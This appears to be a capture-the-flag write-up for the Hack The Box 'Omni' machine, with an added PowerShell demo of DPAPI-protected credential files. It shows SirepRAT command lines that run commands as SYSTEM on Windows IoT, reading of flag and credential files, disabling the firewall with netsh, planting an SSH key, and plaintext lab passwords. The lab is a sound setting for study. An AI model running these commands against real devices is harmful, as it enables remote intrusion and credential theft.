
recon:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 02:29 EDT
Nmap scan report for omni.htb (10.129.4.172)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/23%Time=5F420CB4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.40 seconds

On port 135 I tried impacket-rpcdump and didn't find anything useful (I may have missed something). Port 8080 shows Windows Device Portal; a Google search shows that this is Windows IoT, and another search for related exploits turned up this: https://github.com/SafeBreach-Labs/SirepRAT

I downloaded it and tried it, and sure enough it works.

# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [8:54:45] 
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --as_logged_on_user --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c echo {{userprofile}} && hostname" --v
---------
C:\Data\Users\DefaultAccount
omni

---------

In fact, without --as_logged_on_user the command is executed with SYSTEM privileges.

# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [8:59:54] 
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c echo {{userprofile}} && hostname" --v
---------
C:\Data\Users\System
omni

---------

At this point I thought the story was over, but I suspected it might not be that simple, and it turned out it really wasn't.

# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [9:01:26] C:130
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c type c:\\data\\users\\administrator\\root.txt" --v
---------
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
</Props>
</Obj>
</Objs>
---------

Both root.txt and user.txt are stored as PowerShell SecureStrings. After some reading I learned that they can be decrypted with the following commands:

$cred = Import-CliXml -Path c:\data\Users\administrator\user.txt
echo $cred.GetNetworkCredential().Password

However, I tried many times without success and was stuck here for a long time. Later I found that the user app belongs to the sshd user group, so I ran dir c:\sshd.exe /s /b to find the directory of sshd.exe and executed it to bring up the OpenSSH service. Scanning the ports again showed that it wasn't there, so I ran netsh Advfirewall set allprofiles state off to turn off the firewall, wrote my SSH key into the user's directory, and finally could connect over SSH. However, the command above still failed, showing ConvertFrom-SecureString : Error occurred during a cryptographic operation. After Googling I found that this is because the IoT system has no preset system key, so a key has to be set beforehand before ConvertFrom-SecureString can be used. But I didn't know what the key was, and was stuck again.

Below is the proper solution:

Run dir c:\ /ah /s to search the C drive for all hidden files. Under c:\Program Files\WindowsPowerShell\Modules\PackageManagement there is a file r.bat whose contents are the login credentials for app and administrator:

# root @ kali in ~/hackthebox/machines/omni/SirepRAT on git:master x [9:14:26] C:130
$ python2 SirepRAT.py omni.htb LaunchCommandWithOutput --as_logged_on_user --return_output --cmd "C:\\Windows\\System32\\cmd.exe" --args "/c type c:\\\"Program Files\"\\WindowsPowershell\\Modules\\PackageManagement\\r.bat" --v
---------
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
---------

Log in over SSH with the credentials above (not with a key), and the flag files can then be decrypted normally (this left me quite puzzled).

Actually, logging in over SSH is probably not the intended solution either. The intended solution should be to log in to the website on port 8080 with the credentials above, then use the site's run process command to get a reverse shell back and do the decryption there.
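Why the Import-CliXml command only worked once logged in as the user itself, as an added PowerShell example (not code from the original write-up): Export-CliXml protects a SecureString with DPAPI under the key of the account that runs it, so only that same account on that same machine can read the file back, and running the command as SYSTEM or DefaultAccount through SirepRAT is what produces the cryptographic-operation error. The file path and sample password are constructed for the demonstration.

```powershell
# Added example, not from the original write-up: round-trip of a PSCredential
# through Export-CliXml / Import-CliXml, the format the flag files were stored in.
# Export-CliXml wraps the SecureString with DPAPI using the current user's key,
# so only that user on that machine can decrypt it. Path and password are
# constructed for the demonstration.

$path = Join-Path $env:TEMP 'cred-demo.xml'

# 1. Build and export a credential the same way the flag files were produced.
$secure = ConvertTo-SecureString 'ExamplePassw0rd!' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('flag', $secure)
$cred | Export-CliXml -Path $path

# 2. The <SS> element holds the DPAPI blob (the long hex string seen in root.txt).
#    Nothing in the file identifies which account's key protects it.
$blob = ([xml](Get-Content -Raw $path)).Objs.Obj.Props.SS.InnerText
"DPAPI blob length: $($blob.Length) hex characters"

# 3. Read it back as the same user: this is the command from the write-up.
#    Under a different account (SYSTEM, DefaultAccount, or another user) the
#    same call fails with a cryptographic-operation error.
try {
    $restored = Import-CliXml -Path $path
    $plain    = $restored.GetNetworkCredential().Password
    if ($plain -ne 'ExamplePassw0rd!') { throw 'round-trip mismatch' }
    "Decrypted as $env:USERNAME: OK"
} catch {
    "Decryption failed as $env:USERNAME: $($_.Exception.Message)"
}

# 4. A secret that must be readable by another account or machine has to be
#    protected with an explicit AES key instead of the user's DPAPI key; the
#    key material then becomes the thing that must be guarded.
$key = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($key)
$portable = ConvertFrom-SecureString -SecureString $secure -Key $key
$back     = ConvertTo-SecureString -String $portable -Key $key
$check    = (New-Object System.Management.Automation.PSCredential ('x', $back)).GetNetworkCredential().Password
if ($check -ne 'ExamplePassw0rd!') { throw 'keyed round-trip mismatch' }
"Keyed round-trip: OK"

Remove-Item $path
```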